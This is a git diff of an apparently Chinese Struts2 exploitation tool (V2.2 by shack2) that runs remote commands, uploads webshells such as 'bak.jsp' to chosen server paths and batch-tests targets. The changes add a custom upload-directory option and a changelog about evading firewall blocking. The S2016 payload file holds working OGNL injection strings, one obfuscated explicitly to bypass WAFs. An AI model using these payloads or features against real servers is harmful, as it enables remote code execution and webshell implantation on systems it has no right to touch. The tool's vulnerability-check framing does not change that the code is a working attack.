diff --git a/.gitattributes b/.gitattributes
deleted file mode 100644
index dfe0770..0000000
--- a/.gitattributes
+++ /dev/null
@@ -1,2 +0,0 @@
-# Auto detect text files and perform LF normalization
-* text=auto
diff --git a/.vs/Test/v15/.suo b/.vs/Test/v15/.suo
index 9912f55..1b50d15 100644
Binary files a/.vs/Test/v15/.suo and b/.vs/Test/v15/.suo differ
diff --git a/.vs/Test/v15/Server/sqlite3/storage.ide b/.vs/Test/v15/Server/sqlite3/storage.ide
index 2a61484..a2cc604 100644
Binary files a/.vs/Test/v15/Server/sqlite3/storage.ide and b/.vs/Test/v15/Server/sqlite3/storage.ide differ
diff --git a/.vs/Test/v15/Server/sqlite3/storage.ide-shm b/.vs/Test/v15/Server/sqlite3/storage.ide-shm
index 7c19a36..4056e67 100644
Binary files a/.vs/Test/v15/Server/sqlite3/storage.ide-shm and b/.vs/Test/v15/Server/sqlite3/storage.ide-shm differ
diff --git a/.vs/Test/v15/Server/sqlite3/storage.ide-wal b/.vs/Test/v15/Server/sqlite3/storage.ide-wal
index 4f566e6..0a18771 100644
Binary files a/.vs/Test/v15/Server/sqlite3/storage.ide-wal and b/.vs/Test/v15/Server/sqlite3/storage.ide-wal differ
diff --git a/Test/Main.Designer.cs b/Test/Main.Designer.cs
index e43cb80..301938e 100644
--- a/Test/Main.Designer.cs
+++ b/Test/Main.Designer.cs
@@ -49,7 +49,6 @@ private void InitializeComponent()
this.label3 = new System.Windows.Forms.Label();
this.txt_shellPath = new System.Windows.Forms.TextBox();
this.txt_shellName = new System.Windows.Forms.TextBox();
- this.label4 = new System.Windows.Forms.Label();
this.btn_upload = new System.Windows.Forms.Button();
this.txt_shellContent = new System.Windows.Forms.TextBox();
this.tabPage5 = new System.Windows.Forms.TabPage();
@@ -104,6 +103,7 @@ private void InitializeComponent()
this.splitContainer_top = new System.Windows.Forms.SplitContainer();
this.statusStrip1 = new System.Windows.Forms.StatusStrip();
this.lbl_info = new System.Windows.Forms.ToolStripStatusLabel();
+ this.setUploudPath = new System.Windows.Forms.CheckBox();
this.tabControl1.SuspendLayout();
this.tabPage1.SuspendLayout();
this.tabPage2.SuspendLayout();
@@ -196,7 +196,7 @@ private void InitializeComponent()
this.tabPage2.Location = new System.Drawing.Point(4, 22);
this.tabPage2.Name = "tabPage2";
this.tabPage2.Padding = new System.Windows.Forms.Padding(3);
- this.tabPage2.Size = new System.Drawing.Size(789, 434);
+ this.tabPage2.Size = new System.Drawing.Size(789, 425);
this.tabPage2.TabIndex = 1;
this.tabPage2.Text = "命令执行";
this.tabPage2.UseVisualStyleBackColor = true;
@@ -216,8 +216,8 @@ private void InitializeComponent()
// splitContainer_CMD.Panel2
//
this.splitContainer_CMD.Panel2.Controls.Add(this.txt_cmdResult);
- this.splitContainer_CMD.Size = new System.Drawing.Size(783, 428);
- this.splitContainer_CMD.SplitterDistance = 59;
+ this.splitContainer_CMD.Size = new System.Drawing.Size(783, 419);
+ this.splitContainer_CMD.SplitterDistance = 57;
this.splitContainer_CMD.TabIndex = 13;
//
// groupBox1
@@ -229,7 +229,7 @@ private void InitializeComponent()
this.groupBox1.Dock = System.Windows.Forms.DockStyle.Fill;
this.groupBox1.Location = new System.Drawing.Point(0, 0);
this.groupBox1.Name = "groupBox1";
- this.groupBox1.Size = new System.Drawing.Size(783, 59);
+ this.groupBox1.Size = new System.Drawing.Size(783, 57);
this.groupBox1.TabIndex = 13;
this.groupBox1.TabStop = false;
//
@@ -292,7 +292,7 @@ private void InitializeComponent()
this.txt_cmdResult.Multiline = true;
this.txt_cmdResult.Name = "txt_cmdResult";
this.txt_cmdResult.ScrollBars = System.Windows.Forms.ScrollBars.Vertical;
- this.txt_cmdResult.Size = new System.Drawing.Size(783, 365);
+ this.txt_cmdResult.Size = new System.Drawing.Size(783, 358);
this.txt_cmdResult.TabIndex = 5;
this.txt_cmdResult.Text = "注:执行window的cmd建议输入:cmd /c 命令 这种格式,因为cmd /c执行完会关闭进程\r\n如:cmd /c ipconfig /all\r\n少数情况下" +
"可能执行命令不能成功....";
@@ -304,7 +304,7 @@ private void InitializeComponent()
this.tabPage3.Location = new System.Drawing.Point(4, 22);
this.tabPage3.Name = "tabPage3";
this.tabPage3.Padding = new System.Windows.Forms.Padding(3);
- this.tabPage3.Size = new System.Drawing.Size(789, 434);
+ this.tabPage3.Size = new System.Drawing.Size(789, 425);
this.tabPage3.TabIndex = 2;
this.tabPage3.Text = "文件上传";
this.tabPage3.UseVisualStyleBackColor = true;
@@ -323,21 +323,21 @@ private void InitializeComponent()
// splitContainer_uploadFile.Panel2
//
this.splitContainer_uploadFile.Panel2.Controls.Add(this.txt_shellContent);
- this.splitContainer_uploadFile.Size = new System.Drawing.Size(783, 428);
- this.splitContainer_uploadFile.SplitterDistance = 58;
+ this.splitContainer_uploadFile.Size = new System.Drawing.Size(783, 419);
+ this.splitContainer_uploadFile.SplitterDistance = 56;
this.splitContainer_uploadFile.TabIndex = 11;
//
// groupBox2
//
+ this.groupBox2.Controls.Add(this.setUploudPath);
this.groupBox2.Controls.Add(this.label3);
this.groupBox2.Controls.Add(this.txt_shellPath);
this.groupBox2.Controls.Add(this.txt_shellName);
- this.groupBox2.Controls.Add(this.label4);
this.groupBox2.Controls.Add(this.btn_upload);
this.groupBox2.Dock = System.Windows.Forms.DockStyle.Fill;
this.groupBox2.Location = new System.Drawing.Point(0, 0);
this.groupBox2.Name = "groupBox2";
- this.groupBox2.Size = new System.Drawing.Size(783, 58);
+ this.groupBox2.Size = new System.Drawing.Size(783, 56);
this.groupBox2.TabIndex = 0;
this.groupBox2.TabStop = false;
//
@@ -352,9 +352,10 @@ private void InitializeComponent()
//
// txt_shellPath
//
- this.txt_shellPath.Location = new System.Drawing.Point(111, 20);
+ this.txt_shellPath.Enabled = false;
+ this.txt_shellPath.Location = new System.Drawing.Point(143, 20);
this.txt_shellPath.Name = "txt_shellPath";
- this.txt_shellPath.Size = new System.Drawing.Size(297, 21);
+ this.txt_shellPath.Size = new System.Drawing.Size(265, 21);
this.txt_shellPath.TabIndex = 10;
this.txt_shellPath.Text = "如:/home/web/shell.jsp";
//
@@ -366,15 +367,6 @@ private void InitializeComponent()
this.txt_shellName.TabIndex = 2;
this.txt_shellName.Text = "bak.jsp";
//
- // label4
- //
- this.label4.AutoSize = true;
- this.label4.Location = new System.Drawing.Point(28, 23);
- this.label4.Name = "label4";
- this.label4.Size = new System.Drawing.Size(77, 12);
- this.label4.TabIndex = 9;
- this.label4.Text = "自定义路径:";
- //
// btn_upload
//
this.btn_upload.Location = new System.Drawing.Point(689, 18);
@@ -393,7 +385,7 @@ private void InitializeComponent()
this.txt_shellContent.Multiline = true;
this.txt_shellContent.Name = "txt_shellContent";
this.txt_shellContent.ScrollBars = System.Windows.Forms.ScrollBars.Vertical;
- this.txt_shellContent.Size = new System.Drawing.Size(783, 366);
+ this.txt_shellContent.Size = new System.Drawing.Size(783, 359);
this.txt_shellContent.TabIndex = 8;
this.txt_shellContent.Text = resources.GetString("txt_shellContent.Text");
this.txt_shellContent.KeyDown += new System.Windows.Forms.KeyEventHandler(this.txt_shellContent_KeyDown);
@@ -404,7 +396,7 @@ private void InitializeComponent()
this.tabPage5.Location = new System.Drawing.Point(4, 22);
this.tabPage5.Name = "tabPage5";
this.tabPage5.Padding = new System.Windows.Forms.Padding(3);
- this.tabPage5.Size = new System.Drawing.Size(789, 434);
+ this.tabPage5.Size = new System.Drawing.Size(789, 425);
this.tabPage5.TabIndex = 4;
this.tabPage5.Text = "批量验证";
this.tabPage5.UseVisualStyleBackColor = true;
@@ -423,8 +415,8 @@ private void InitializeComponent()
// splitContainer_batchCheck.Panel2
//
this.splitContainer_batchCheck.Panel2.Controls.Add(this.bt_lvw);
- this.splitContainer_batchCheck.Size = new System.Drawing.Size(783, 428);
- this.splitContainer_batchCheck.SplitterDistance = 94;
+ this.splitContainer_batchCheck.Size = new System.Drawing.Size(783, 419);
+ this.splitContainer_batchCheck.SplitterDistance = 92;
this.splitContainer_batchCheck.TabIndex = 30;
//
// groupBox4
@@ -452,7 +444,7 @@ private void InitializeComponent()
this.groupBox4.Dock = System.Windows.Forms.DockStyle.Fill;
this.groupBox4.Location = new System.Drawing.Point(0, 0);
this.groupBox4.Name = "groupBox4";
- this.groupBox4.Size = new System.Drawing.Size(783, 94);
+ this.groupBox4.Size = new System.Drawing.Size(783, 92);
this.groupBox4.TabIndex = 0;
this.groupBox4.TabStop = false;
//
@@ -665,10 +657,11 @@ private void InitializeComponent()
this.bt_lvw.ContextMenuStrip = this.contextMenuStrip1;
this.bt_lvw.Dock = System.Windows.Forms.DockStyle.Fill;
this.bt_lvw.FullRowSelect = true;
+ this.bt_lvw.GridLines = true;
this.bt_lvw.HideSelection = false;
this.bt_lvw.Location = new System.Drawing.Point(0, 0);
this.bt_lvw.Name = "bt_lvw";
- this.bt_lvw.Size = new System.Drawing.Size(783, 330);
+ this.bt_lvw.Size = new System.Drawing.Size(783, 323);
this.bt_lvw.TabIndex = 0;
this.bt_lvw.UseCompatibleStateImageBehavior = false;
this.bt_lvw.View = System.Windows.Forms.View.Details;
@@ -945,6 +938,17 @@ private void InitializeComponent()
this.lbl_info.Name = "lbl_info";
this.lbl_info.Size = new System.Drawing.Size(0, 17);
//
+ // setUploudPath
+ //
+ this.setUploudPath.AutoSize = true;
+ this.setUploudPath.Location = new System.Drawing.Point(23, 25);
+ this.setUploudPath.Name = "setUploudPath";
+ this.setUploudPath.Size = new System.Drawing.Size(108, 16);
+ this.setUploudPath.TabIndex = 11;
+ this.setUploudPath.Text = "自定义上传目录";
+ this.setUploudPath.UseVisualStyleBackColor = true;
+ this.setUploudPath.CheckStateChanged += new System.EventHandler(this.setUploudPath_CheckStateChanged);
+ //
// Main
//
this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);
@@ -955,7 +959,7 @@ private void InitializeComponent()
this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.FixedSingle;
this.Name = "Main";
this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
- this.Text = "Struts2漏洞检查工具2018版 V2.1 by shack2 20190617";
+ this.Text = "Struts2漏洞检查工具2019版 V2.2 by shack2 20190925";
this.FormClosing += new System.Windows.Forms.FormClosingEventHandler(this.Main_FormClosing);
this.Shown += new System.EventHandler(this.Main_Shown);
this.tabControl1.ResumeLayout(false);
@@ -1017,7 +1021,6 @@ private void InitializeComponent()
private System.Windows.Forms.TextBox txt_shellName;
private System.Windows.Forms.TextBox txt_shellContent;
private System.Windows.Forms.TextBox txt_shellPath;
- private System.Windows.Forms.Label label4;
private System.Windows.Forms.TextBox txt_cmdResult;
private System.Windows.Forms.Button btn_startCmd;
private System.Windows.Forms.Label label5;
@@ -1078,6 +1081,7 @@ private void InitializeComponent()
private System.Windows.Forms.Label label14;
private System.Windows.Forms.StatusStrip statusStrip1;
private System.Windows.Forms.ToolStripStatusLabel lbl_info;
+ private System.Windows.Forms.CheckBox setUploudPath;
}
}
diff --git a/Test/Main.cs b/Test/Main.cs
index 92584b9..ea290b4 100644
--- a/Test/Main.cs
+++ b/Test/Main.cs
@@ -113,6 +113,7 @@ public String request(String method, String url, String data, String exp, String
{
request.Method = "POST";
request.ContentType = "multipart/form-data";
+ request.AddMuHeader("\"" + data + "\"", "x");
}
else
{
@@ -138,10 +139,6 @@ public String request(String method, String url, String data, String exp, String
request.ContentType = exp;
}
- else {
-
- request.AddMuHeader("\"" + data + "\"", "x");
- }
String body = request.GetBody(data);
request.Body = body;
@@ -321,7 +318,7 @@ public void getVerinfo()
else if (!vul.Equals("S2-045") && !vul.Equals("S2-046"))
{
- result = Tools.getContent(request(method, url, "", bp.Get_Exp_VerInfo("os.name"), cookie, vul), vul) + "\r\n";
+ result = Tools.getContent(request(method, url, bp.Get_Exp_VerInfo("os.name"),"" , cookie, vul), vul) + "\r\n";
result += Tools.getContent(request(method, url, bp.Get_Exp_VerInfo("os.version"), "", cookie, vul), vul) + "\r\n";
result += Tools.getContent(request(method, url, bp.Get_Exp_Path(), "", cookie, vul), vul) + "\r\n";
}
@@ -441,7 +438,7 @@ public void executeBatchCmd(Object url)
this.btn_exeBatchCMD.Enabled = true;
}
- public static int version = 20190617;
+ public static int version = 20190925;
public static string versionURL = "http://www.shack2.org/soft/getNewVersion?ENNAME=Struts2VulsTools&NO=" + URLEncode.UrlEncode(Tools.getSystemSid()) + "&VERSION=" + version;
//检查更新
public void checkUpdate()
@@ -534,11 +531,22 @@ public void uploadFile()
String url = this.txt_url.Text;
String cookie = this.txt_cookie.Text;
String result = Tools.getContent(uploadFile(url,shellPath, shellName,cookie,this.com_vul.Text), this.com_vul.Text);
-
+ String path = "";
+ String pathfilename = "";
if (result.IndexOf("okokok") != -1)
{
- MessageBox.Show("上传成功----" + getFilePath(url, result, shellName));
- LogError("上传访问路径:" + getFilePath(url, result, shellName));
+ if (this.setUploudPath.Checked&& !"".Equals(shellPath))
+ {
+
+ path = shellPath;
+ pathfilename = shellPath + shellName;
+ }
+ else {
+ pathfilename = getFilePath(url, result, shellName);
+ }
+ MessageBox.Show("上传成功----" + pathfilename);
+
+ LogError("上传访问路径:" + pathfilename);
}
else {
LogError("上传失败!");
@@ -554,7 +562,7 @@ public String getFilePath(String url,String result,String fileName) {
if (c != -1)
{
String cpath = result.Substring(c);
- return rootPath + cpath.Replace("okokok","")+ "/"+ fileName;
+ return rootPath + result.Replace("okokok","")+ "/"+ fileName;
}
else {
return "未获取到shell路径,请人工访问。";
@@ -568,9 +576,8 @@ public String uploadFile(String url,String shellPath,String shellName,String coo
String fileContent = this.txt_shellContent.Text;
String fileContent_encode = System.Web.HttpUtility.UrlEncode(fileContent, Encoding.UTF8);
String path = "";
- if (!"如:/home/web/shell.jsp".Equals(shellPath) && !"".Equals(shellPath))
+ if (this.setUploudPath.Checked && !"".Equals(shellPath))
{
-
path = shellPath;
}
BasePayload bp = getPayload(vulName);
@@ -1077,5 +1084,17 @@ private void com_vul_TextChanged(object sender, EventArgs e)
MessageBox.Show("S2-045,S2-046不支持复杂数据类型提交!");
}
}
+
+ private void setUploudPath_CheckStateChanged(object sender, EventArgs e)
+ {
+ if (this.setUploudPath.Checked)
+ {
+ this.txt_shellPath.Enabled = true;
+ }
+ else
+ {
+ this.txt_shellPath.Enabled = false;
+ }
+ }
}
}
\ No newline at end of file
diff --git a/Test/Main.resx b/Test/Main.resx
index 63dea51..88f3e04 100644
--- a/Test/Main.resx
+++ b/Test/Main.resx
@@ -118,7 +118,9 @@
System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
- 2018-08-24:
+ 2019-09-25:
+优化部分EXP在部分情况下被WAF拦截的问题,提高检测成功率,优化自定义上传路径exp,文件所在目录不存在时自动创建目录,防止文件因为目录不存在,导致上传失败。
+2018-08-24:
增加S2-057 Struts 2.3 to 2.3.34,Struts 2.5 to 2.5.16 此漏洞影响范围非常小,要求配置条件比较苛刻,同时,一些特定版本没有看到有沙盒绕过,所以,目前exp只是基于S2-045改写的,所以exp并不是所有版本都能用,正常情况下Struts 2.3.5-2.3.31,Struts 2.5-2.5.10版本可以使用此exp。
2017-07-07:
增加S2-048 Struts 2.3.X 支持检查官方示例struts2-showcase应用的代码执行漏洞,参考地址:http://127.0.0.1:8080/struts2-showcase/integration/saveGangster.action
diff --git a/Test/Properties/AssemblyInfo.cs b/Test/Properties/AssemblyInfo.cs
index 1f010a9..fceff8d 100644
--- a/Test/Properties/AssemblyInfo.cs
+++ b/Test/Properties/AssemblyInfo.cs
@@ -10,7 +10,7 @@
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("Microsoft")]
[assembly: AssemblyProduct("Test")]
-[assembly: AssemblyCopyright("Copyright © Microsoft 2017")]
+[assembly: AssemblyCopyright("Copyright © Microsoft 2019")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
@@ -32,5 +32,5 @@
// 可以指定所有这些值,也可以使用“内部版本号”和“修订号”的默认值,
// 方法是按如下所示使用“*”:
// [assembly: AssemblyVersion("1.0.*")]
-[assembly: AssemblyVersion("1.8.0.0")]
-[assembly: AssemblyFileVersion("1.8.0.0")]
+[assembly: AssemblyVersion("2.2.0.0")]
+[assembly: AssemblyFileVersion("2.2.0.0")]
diff --git a/Test/bin/Debug/Test.exe b/Test/bin/Debug/Test.exe
new file mode 100644
index 0000000..ff40bd7
Binary files /dev/null and b/Test/bin/Debug/Test.exe differ
diff --git a/Test/bin/Debug/Test.pdb b/Test/bin/Debug/Test.pdb
new file mode 100644
index 0000000..ac7aa94
Binary files /dev/null and b/Test/bin/Debug/Test.pdb differ
diff --git a/Test/bin/Debug/Test.vshost.exe b/Test/bin/Debug/Test.vshost.exe
new file mode 100644
index 0000000..681ab77
Binary files /dev/null and b/Test/bin/Debug/Test.vshost.exe differ
diff --git a/Test/bin/Debug/Test.vshost.exe.manifest b/Test/bin/Debug/Test.vshost.exe.manifest
new file mode 100644
index 0000000..061c9ca
--- /dev/null
+++ b/Test/bin/Debug/Test.vshost.exe.manifest
@@ -0,0 +1,11 @@
+
+
+
+
+
+
+
+
+
+
+
diff --git a/Test/bin/Debug/cmd.txt b/Test/bin/Debug/cmd.txt
new file mode 100644
index 0000000..0700152
--- /dev/null
+++ b/Test/bin/Debug/cmd.txt
@@ -0,0 +1 @@
+whoami
\ No newline at end of file
diff --git a/Test/bin/Release/Test.exe b/Test/bin/Release/Test.exe
new file mode 100644
index 0000000..61ec033
Binary files /dev/null and b/Test/bin/Release/Test.exe differ
diff --git a/Test/bin/Release/Test.exe.config b/Test/bin/Release/Test.exe.config
new file mode 100644
index 0000000..e365603
--- /dev/null
+++ b/Test/bin/Release/Test.exe.config
@@ -0,0 +1,3 @@
+
+
+
diff --git a/Test/bin/Release/Test.pdb b/Test/bin/Release/Test.pdb
new file mode 100644
index 0000000..ac5a575
Binary files /dev/null and b/Test/bin/Release/Test.pdb differ
diff --git a/Test/bin/Release/Test.vshost.exe b/Test/bin/Release/Test.vshost.exe
new file mode 100644
index 0000000..8f90da4
Binary files /dev/null and b/Test/bin/Release/Test.vshost.exe differ
diff --git a/Test/bin/Release/Test.vshost.exe.config b/Test/bin/Release/Test.vshost.exe.config
new file mode 100644
index 0000000..e365603
--- /dev/null
+++ b/Test/bin/Release/Test.vshost.exe.config
@@ -0,0 +1,3 @@
+
+
+
diff --git a/Test/http/model/Config.cs b/Test/http/model/Config.cs
index b9cd038..eb221be 100644
--- a/Test/http/model/Config.cs
+++ b/Test/http/model/Config.cs
@@ -15,5 +15,6 @@ public class Config
public String FileContent = "";
public Boolean isExeCMD = false;
public Boolean isUpFile = false;
+ public Boolean isSetUploadPath = false;
}
}
diff --git a/Test/http/model/HttpRequest.cs b/Test/http/model/HttpRequest.cs
index 7518b22..8fe2fb0 100644
--- a/Test/http/model/HttpRequest.cs
+++ b/Test/http/model/HttpRequest.cs
@@ -105,20 +105,18 @@ public String GetBody(String data)
sb.Append("Cookie: " + Cookie + "\r\n");
}
sb.Append("\r\n");
-
- if (!"".Equals(data))
- {
- sb.Append(data);
- }
-
- else if (MUData.Count > 0)
+ if (MUData.Count > 0)
{
foreach (var c in this.MUData)
- {
- sb.Append("-----------------------------7e116d19044c\r\nContent-Disposition: form-data; name=" + c.Key+"\r\n\r\n" + c.Value+ "\r\n");
- }
+ {
+ sb.Append("-----------------------------7e116d19044c\r\nContent-Disposition: form-data; name=" + c.Key + "\r\n\r\n" + c.Value + "\r\n");
+ }
sb.Append("-----------------------------7e116d19044c--");
- }
+ }
+ else if (!"".Equals(data))
+ {
+ sb.Append(data);
+ }
return sb.ToString();
}
diff --git a/Test/obj/Debug/DesignTimeResolveAssemblyReferences.cache b/Test/obj/Debug/DesignTimeResolveAssemblyReferences.cache
index 3265a2f..809c7a9 100644
Binary files a/Test/obj/Debug/DesignTimeResolveAssemblyReferences.cache and b/Test/obj/Debug/DesignTimeResolveAssemblyReferences.cache differ
diff --git a/Test/obj/Debug/Test.Main.resources b/Test/obj/Debug/Test.Main.resources
index 8c95bce..0b82cff 100644
Binary files a/Test/obj/Debug/Test.Main.resources and b/Test/obj/Debug/Test.Main.resources differ
diff --git a/Test/obj/Debug/Test.csproj.FileListAbsolute.txt b/Test/obj/Debug/Test.csproj.FileListAbsolute.txt
index d889620..dd1b2e3 100644
--- a/Test/obj/Debug/Test.csproj.FileListAbsolute.txt
+++ b/Test/obj/Debug/Test.csproj.FileListAbsolute.txt
@@ -128,3 +128,12 @@ F:\MyCoding\c#\projects\struts2018\Test\obj\Debug\Test.csproj.GenerateResource.c
F:\MyCoding\c#\projects\struts2018\Test\obj\Debug\Test.csproj.CoreCompileInputs.cache
F:\MyCoding\c#\projects\struts2018\Test\obj\Debug\Test.exe
F:\MyCoding\c#\projects\struts2018\Test\obj\Debug\Test.pdb
+F:\MyCoding\c#\GitHub\struts2018\Struts2VulsTools\Test\bin\Debug\Test.exe
+F:\MyCoding\c#\GitHub\struts2018\Struts2VulsTools\Test\bin\Debug\Test.pdb
+F:\MyCoding\c#\GitHub\struts2018\Struts2VulsTools\Test\obj\Debug\Test.csprojAssemblyReference.cache
+F:\MyCoding\c#\GitHub\struts2018\Struts2VulsTools\Test\obj\Debug\Test.Main.resources
+F:\MyCoding\c#\GitHub\struts2018\Struts2VulsTools\Test\obj\Debug\Test.Properties.Resources.resources
+F:\MyCoding\c#\GitHub\struts2018\Struts2VulsTools\Test\obj\Debug\Test.csproj.GenerateResource.cache
+F:\MyCoding\c#\GitHub\struts2018\Struts2VulsTools\Test\obj\Debug\Test.csproj.CoreCompileInputs.cache
+F:\MyCoding\c#\GitHub\struts2018\Struts2VulsTools\Test\obj\Debug\Test.exe
+F:\MyCoding\c#\GitHub\struts2018\Struts2VulsTools\Test\obj\Debug\Test.pdb
diff --git a/Test/obj/Debug/Test.csproj.GenerateResource.cache b/Test/obj/Debug/Test.csproj.GenerateResource.cache
index 85a5e1d..9ce96f6 100644
Binary files a/Test/obj/Debug/Test.csproj.GenerateResource.cache and b/Test/obj/Debug/Test.csproj.GenerateResource.cache differ
diff --git a/Test/obj/Debug/Test.exe b/Test/obj/Debug/Test.exe
index 37c53a6..ff40bd7 100644
Binary files a/Test/obj/Debug/Test.exe and b/Test/obj/Debug/Test.exe differ
diff --git a/Test/obj/Debug/Test.pdb b/Test/obj/Debug/Test.pdb
index 0dc193c..ac7aa94 100644
Binary files a/Test/obj/Debug/Test.pdb and b/Test/obj/Debug/Test.pdb differ
diff --git a/Test/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache b/Test/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache
index f2fde64..416db39 100644
Binary files a/Test/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache and b/Test/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache differ
diff --git a/Test/obj/Release/Test.Main.resources b/Test/obj/Release/Test.Main.resources
index 34675a2..0b82cff 100644
Binary files a/Test/obj/Release/Test.Main.resources and b/Test/obj/Release/Test.Main.resources differ
diff --git a/Test/obj/Release/Test.csproj.CoreCompileInputs.cache b/Test/obj/Release/Test.csproj.CoreCompileInputs.cache
new file mode 100644
index 0000000..afdb463
--- /dev/null
+++ b/Test/obj/Release/Test.csproj.CoreCompileInputs.cache
@@ -0,0 +1 @@
+f77e91520dcb262a2b0d25ae4f8ed7ad9eeafb4f
diff --git a/Test/obj/Release/Test.csproj.FileListAbsolute.txt b/Test/obj/Release/Test.csproj.FileListAbsolute.txt
index 0518da7..0fba272 100644
--- a/Test/obj/Release/Test.csproj.FileListAbsolute.txt
+++ b/Test/obj/Release/Test.csproj.FileListAbsolute.txt
@@ -16,3 +16,12 @@ F:\MyCoding\c#\projects\struts2017\Test\obj\Release\Test.Main.resources
F:\MyCoding\c#\projects\struts2017\Test\obj\Release\Test.Properties.Resources.resources
F:\MyCoding\c#\projects\struts2017\Test\obj\Release\Test.csproj.GenerateResource.Cache
F:\MyCoding\c#\projects\struts2017\Test\bin\Release\SmartThreadPool.dll
+F:\MyCoding\c#\projects\struts2018\Test\bin\Release\Test.exe
+F:\MyCoding\c#\projects\struts2018\Test\bin\Release\Test.pdb
+F:\MyCoding\c#\projects\struts2018\Test\obj\Release\Test.Main.resources
+F:\MyCoding\c#\projects\struts2018\Test\obj\Release\Test.Properties.Resources.resources
+F:\MyCoding\c#\projects\struts2018\Test\obj\Release\Test.csproj.GenerateResource.cache
+F:\MyCoding\c#\projects\struts2018\Test\obj\Release\Test.csproj.CoreCompileInputs.cache
+F:\MyCoding\c#\projects\struts2018\Test\obj\Release\Test.exe
+F:\MyCoding\c#\projects\struts2018\Test\obj\Release\Test.pdb
+F:\MyCoding\c#\projects\struts2018\Test\obj\Release\Test.csprojAssemblyReference.cache
diff --git a/Test/obj/Release/Test.csproj.GenerateResource.Cache b/Test/obj/Release/Test.csproj.GenerateResource.Cache
index 1ea1926..e823d83 100644
Binary files a/Test/obj/Release/Test.csproj.GenerateResource.Cache and b/Test/obj/Release/Test.csproj.GenerateResource.Cache differ
diff --git a/Test/obj/Release/Test.csprojAssemblyReference.cache b/Test/obj/Release/Test.csprojAssemblyReference.cache
new file mode 100644
index 0000000..28570a9
Binary files /dev/null and b/Test/obj/Release/Test.csprojAssemblyReference.cache differ
diff --git a/Test/obj/Release/Test.exe b/Test/obj/Release/Test.exe
index 524bebb..61ec033 100644
Binary files a/Test/obj/Release/Test.exe and b/Test/obj/Release/Test.exe differ
diff --git a/Test/obj/Release/Test.pdb b/Test/obj/Release/Test.pdb
index 5bf649f..ac5a575 100644
Binary files a/Test/obj/Release/Test.pdb and b/Test/obj/Release/Test.pdb differ
diff --git a/Test/payload/S2016.cs b/Test/payload/S2016.cs
index 2cee517..8d796a4 100644
--- a/Test/payload/S2016.cs
+++ b/Test/payload/S2016.cs
@@ -6,12 +6,26 @@ namespace payload
{
public class S2016 : BasePayload
{
- private String Exp_Check = "redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22struts2_security_%22),%23resp.getWriter().print(%22check%22),%23resp.getWriter().flush(),%23resp.getWriter().close()}";
- private String Exp_VerInfo = "redirect:${%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22[vername]:%22),%23resp.getWriter().print(@java.lang.System@getProperty(%22[vername]%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()}";
+ private String Exp_Check = "redirect:$%7b%23req%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27%29,%23resp%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27%29,%23resp.setCharacterEncoding%28%27UTF-8%27%29,%23resp.getWriter%28%29.print%28%22struts2_security_%22%29,%23resp.getWriter%28%29.print%28%22check%22%29,%23resp.getWriter%28%29.flush%28%29,%23resp.getWriter%28%29.close%28%29%7d";
+
+
+ //private String Exp_VerInfo = "redirect:$%7b%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23req%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27%29,%23resp%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27%29,%23resp.setCharacterEncoding%28%27UTF-8%27%29,%23resp.getWriter%28%29.print%28%22[vername]:%22%29,%23resp.getWriter%28%29.print%28%40java.lang.System%40getProperty%28%22[vername]%22%29%29,%23resp.getWriter%28%29.flush%28%29,%23resp.getWriter%28%29.close%28%29%7d";
+
+ //绕过部分waf
+ private String Exp_VerInfo = "redirect:$%7b%23_member%41ccess%3d%40og%6el.Og%6elCo%6etext%40DEFAULT_MEMBER_%41CCESS,%23req%3d%23co%6etext.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27%29,%23resp%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27%29,%23resp.setCharacterEncoding%28%27UTF-8%27%29,%23resp.getWriter%28%29.print%28%22[vername]:%22%29,%23resp.getWriter%28%29.print%28%40java.lang.%53ystem%40getProperty%28%22[vername]%22%29%29,%23resp.getWriter%28%29.flush%28%29,%23resp.getWriter%28%29.close%28%29%7d";
+
